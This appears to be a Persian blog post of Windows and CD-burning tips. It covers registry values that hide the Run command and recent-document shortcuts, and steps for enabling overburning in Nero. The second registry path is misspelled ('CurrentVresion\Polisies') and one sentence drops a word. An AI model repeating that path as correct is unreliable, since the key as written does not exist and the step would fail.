برداشتن RUN از منوي START :

به زير كليد زير برويد:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

و يك مقدار باينري  به نام NoRun بسازيد و به آن مقدار01  بدهيد.بدين ترتيب حتي كليدهاي  نيز كار نخواهند كرد.

بدون جاسوس:

وقتي سندي را باز ميكنيد , ويندوز يك ميانبر براي آن فايل درMy Documents  در منوي Start قرار ميدهد.اين موضوع ميتواند به عنوان يك جاسوس بر ضد شما عمل كند.

براي حذف آن به زير كليد زير برويد:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVresion\Polisies\Explorer]

و يك مقدار باينري به نام NoRecentDocsHistory بسازيد و به آن مقدار01  بدهيد.همچنين براي حذف آن از منوي  ميتوانيد يك مقدار باينري به نام NoRecentDocsMenu بسازيد و به آن مقدار 01 را بدهيد.

موفق باشید

لطفا نظر فراموش نشه

ابتدا مي بايست ببينيد رايتر شما overburning ساپورت مي کنه يا نه . براي تست اين کار مراحل زير را دنبال کنيد :

ابتدا به برنامه Nero رفته و سپس کليد هاي ترکيبي Ctrl + R را فشار دهيد . تو اين پنجره ببينيد که در قسمت Recorder information ، رو به روي عبارت Over burn عبارت suported نوشته شده است يا نه . اگر عبارت ساپورت نوشته شده باشد شما مي تو نيد از اين ترفند استفاده کنيد .

حال به منوي File رفته و قسمت preferences رو انتخاب کنيد سپس در قسمت Expert features دقت کنيد که عبارت enable overburn قعال باشد . در زير همين گزينه مقدار مجاز overburn رو به دقيقه مشخص کنيد .

حال به منوي File رفته و گزينه New را انتخاب کنيد و در قسمت Multisession گزينه No Muttisession را انتخاب نماييد . سپس در قسمت Burn عبارت Write Method رو به Disc at Onec تبديل کنيد .

حال مي تونيد سي دي خود را رايت کنيد مقدار رايت هم بستگي خيلي زيادي به رايتر داره .